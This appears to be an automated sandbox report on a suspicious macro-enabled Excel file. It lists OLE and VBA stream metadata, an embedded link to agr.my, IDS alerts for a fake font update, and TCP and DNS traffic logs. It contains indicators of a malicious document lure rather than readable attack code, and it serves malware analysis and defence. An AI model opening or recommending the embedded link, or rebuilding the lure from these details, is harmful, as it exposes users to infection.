                                          Stream Path:MBD00E31B38/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:99
                                          Entropy:3.631242196770981
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                          General
                                          Stream Path:MBD00E31B38/Package
                                          CLSID:
                                          File Type:Microsoft Excel 2007+
                                          Stream Size:1099182
                                          Entropy:7.995133395558438
                                          Base64 Encoded:True
                                          Data ASCII:P K . . . . . . . . . . ! . w 1 . . . . j . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          General
                                          Stream Path:MBD00E31B39/\x1Ole
                                          CLSID:
                                          File Type:data
                                          Stream Size:718
                                          Entropy:5.460169186385878
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . W B o . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . g . r . . . m . y . / . m . S . G . a . l . N . ? . & . m . o . r . n . i . n . g . . . & h . > X . F . . . ' N Q C t : { & Y 1 . # . v 3 . } . % . S ` M R . . B . y . 9 6 L . . b a + . 8 . . f n . g . ] & Q f . N / T . V . : < y 2 . . { . O d | . 2 + y . 6 . 0 K L 9 * . . . . . . . . . . . . . . . . z . . . p . l . y . p . V . n . j . O . 9 . P . q . u . Z . C . h . K . N . o . 5 . 2 . H . N . h . F . X
                                          General
                                          Stream Path:Workbook
                                          CLSID:
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:139423
                                          Entropy:7.995407604620061
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ^ ` . \\ O # . I U 3 0 G . s Q L j y Z 6 N . \\ N a r B . . . . . . . . . . # . . . \\ . p . | 2 % . K E c ; . 5 . . L . b . . C V 2 O . w J . . & A v W n | . . . b . ? q k . / B r v / d . O + . K @ J B . . . k a . . . . . . . = . . . , 6 . . . . l : w U n . . . . . . . . . . . . . . . . . . . . ( . . . z = . . . 8 . / . @ { . U @ . . . 5 . . . " . . . } . . . . { . . . . . . . 1 . . . . . ? . W z ' X b l , u . 9 a y 1 . . . . 6 T 7 . p U . . h R f ) @
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                                          CLSID:
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:533
                                          Entropy:5.247821152121627
                                          Base64 Encoded:True
                                          Data ASCII:I D = " { 6 F D 0 0 2 2 1 - 2 3 5 0 - 4 4 9 5 - A 0 2 D - 9 E 7 1 A B C 7 6 5 6 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 7 B 5 1 5 B 8 E B 4 8 D E 4 C D
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                          CLSID:
                                          File Type:data
                                          Stream Size:104
                                          Entropy:3.0488640812019017
                                          Base64 Encoded:False
                                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                          CLSID:
                                          File Type:data
                                          Stream Size:2644
                                          Entropy:3.988782629455173
                                          Base64 Encoded:False
                                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                          CLSID:
                                          File Type:data
                                          Stream Size:553
                                          Entropy:6.3538580218673495
                                          Base64 Encoded:True
                                          Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 8 . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2


                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                          2025-03-26T08:12:53.394623+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 13.107.246.38 | 443 | TCP
                                          2025-03-26T08:13:00.433166+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 13.107.246.38 | 443 | TCP
                                          2025-03-26T08:13:00.433822+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 13.107.246.38 | 443 | TCP
                                          • Total Packets: 232
                                          • 443 (HTTPS)
                                          • 80 (HTTP)
                                          • 53 (DNS)
                                          Mar 26, 2025 08:12:54.951781034 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.951831102 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.951845884 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.951889038 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.979367018 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.979393005 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.979434967 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.979448080 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:54.979470968 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:54.979487896 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.006936073 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.006963015 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.007003069 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.007016897 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.007050991 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.007067919 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.045978069 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.046001911 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.046060085 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.046073914 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.046107054 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.069334030 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.069360018 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.069403887 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.069417953 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.069468021 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.093151093 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.093177080 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.093210936 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.093225002 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.093245029 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.093264103 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.138804913 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.138840914 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.138880014 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.138899088 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.138931990 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.138952017 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260024071 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260051966 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260093927 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260116100 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260137081 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260139942 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260163069 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260173082 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260185957 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260191917 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260227919 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260236979 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260262012 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260284901 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260292053 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.260303020 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.260341883 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.263271093 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.263289928 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.263329029 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.263343096 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.263367891 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.263386011 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.300359964 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.300429106 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.300457001 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.300472975 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.300498962 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.300519943 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.352034092 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.352083921 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.352106094 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.352122068 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.352135897 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.352165937 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.388721943 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.388777971 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.388798952 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.388809919 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.388838053 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.388851881 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.442804098 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.442866087 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.442893028 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.442903996 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.442929029 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.442948103 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.474087000 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.474133015 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.474164009 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.474169970 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.474199057 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.474217892 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.528127909 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.528196096 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.528206110 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.528229952 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.528243065 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.528289080 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.568067074 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.568128109 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.568157911 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.568169117 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.568201065 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.568227053 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.607492924 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.607547045 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.607594967 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.607605934 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.607625961 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.607649088 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.653156996 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.653212070 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.653292894 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.653292894 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.653305054 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.653451920 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.766732931 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.766789913 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.766823053 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.766830921 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.766886950 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.827750921 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.827814102 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.827914953 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.827915907 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.827918053 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.827951908 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.828003883 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.828003883 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.828006029 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.828032970 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.828078032 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.828078032 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.858773947 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.858802080 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.858907938 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.858907938 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.858916998 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.858961105 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.925144911 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.925194979 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.925280094 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.925280094 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:55.925288916 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:55.925434113 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.058860064 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.058943987 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.058964014 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.058978081 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059006929 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059051991 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059062958 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059093952 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059123039 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059142113 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059195995 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059195995 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.059202909 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.059351921 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226135969 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226162910 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226201057 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226205111 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226222038 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226242065 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226243019 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.226270914 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226556063 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.226562977 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.227047920 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.334284067 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.334312916 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.334425926 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.334425926 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.334440947 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.334825993 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.450032949 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.450062990 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.450179100 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.450179100 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.450193882 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.450537920 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557138920 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557169914 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557214975 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557233095 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557251930 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557287931 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557450056 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557596922 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557619095 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557698965 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557698965 CET49700443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:12:56.557708025 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:12:56.557713985 CET4434970013.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.150660992 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.150703907 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.150974989 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151371002 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151379108 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.151380062 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151427984 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.151492119 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151617050 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.151631117 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.432461023 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.433166027 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.433181047 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.433482885 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.433821917 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.433854103 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.434560061 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.434581995 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.434721947 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.434748888 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617794037 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617825031 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617883921 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.617883921 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618026018 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618252993 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618275881 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.618304014 CET49701443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.618310928 CET4434970113.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.635813951 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.635896921 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.635972023 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.636333942 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.636358976 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:00.636374950 CET49702443192.168.2.713.107.246.38
                                          Mar 26, 2025 08:13:00.636383057 CET4434970213.107.246.38192.168.2.7
                                          Mar 26, 2025 08:13:36.220487118 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:36.548090935 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:37.188719034 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:38.454374075 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:40.985586882 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:46.032517910 CET4969880192.168.2.7209.46.124.102
                                          Mar 26, 2025 08:13:56.126231909 CET4969880192.168.2.7209.46.124.102
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Mar 26, 2025 08:12:37.069842100 CET | 58449 | 53 | 192.168.2.7 | 1.1.1.1 |
| Mar 26, 2025 08:12:38.073703051 CET | 58449 | 53 | 192.168.2.7 | 1.1.1.1 |
| Mar 26, 2025 08:12:39.073786974 CET | 58449 | 53 | 192.168.2.7 | 1.1.1.1 |
| Mar 26, 2025 08:12:39.189438105 CET | 53 | 58449 | 1.1.1.1 | 192.168.2.7 |
| Mar 26, 2025 08:12:52.969202995 CET | 53455 | 53 | 192.168.2.7 | 1.1.1.1 |
| Mar 26, 2025 08:12:53.087416887 CET | 53 | 53455 | 1.1.1.1 | 192.168.2.7 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Mar 26, 2025 08:12:37.069842100 CET | 192.168.2.7 | 1.1.1.1 | 0x397b | Standard query (0) | agr.my | A (IP address) | IN (0x0001) | false |
| Mar 26, 2025 08:12:38.073703051 CET | 192.168.2.7 | 1.1.1.1 | 0x397b | Standard query (0) | agr.my | A (IP address) | IN (0x0001) | false |
| Mar 26, 2025 08:12:39.073786974 CET | 192.168.2.7 | 1.1.1.1 | 0x397b | Standard query (0) | agr.my | A (IP address) | IN (0x0001) | false |
| Mar 26, 2025 08:12:52.969202995 CET | 192.168.2.7 | 1.1.1.1 | 0xa410 | Standard query (0) | otelrules.svc.static.microsoft | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Mar 26, 2025 08:11:47.936304092 CET | 1.1.1.1 | 192.168.2.7 | 0xc6c1 | No error (0) | ecs-office.s-0005.dual-s-msedge.net | s-0005.dual-s-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 26, 2025 08:11:47.936304092 CET | 1.1.1.1 | 192.168.2.7 | 0xc6c1 | No error (0) | s-0005.dual-s-msedge.net | | 52.123.129.14 | A (IP address) | IN (0x0001) | false |
| Mar 26, 2025 08:11:47.936304092 CET | 1.1.1.1 | 192.168.2.7 | 0xc6c1 | No error (0) | s-0005.dual-s-msedge.net | | 52.123.128.14 | A (IP address) | IN (0x0001) | false |
| Mar 26, 2025 08:11:48.372292042 CET | 1.1.1.1 | 192.168.2.7 | 0xa505 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Mar 26, 2025 08:11:48.372292042 CET | 1.1.1.1 | 192.168.2.7 | 0xa505 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Mar 26, 2025 08:12:39.189438105 CET | 1.1.1.1 | 192.168.2.7 | 0x397b | No error (0) | agr.my | | 147.79.86.93 | A (IP address) | IN (0x0001) | false |
